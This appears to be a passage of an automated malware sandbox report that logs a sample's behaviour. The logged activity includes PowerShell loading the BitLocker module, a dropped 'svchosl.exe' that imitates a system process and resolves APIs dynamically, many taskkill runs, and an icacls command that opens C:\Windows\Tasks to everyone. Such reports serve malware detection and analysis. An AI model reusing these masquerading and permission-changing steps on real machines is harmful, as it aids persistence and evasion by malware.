Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B3242E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 14_2_00007FF77B3242E0
Uses cacls to modify the permissions of files
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\123.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\mig.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\mig.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
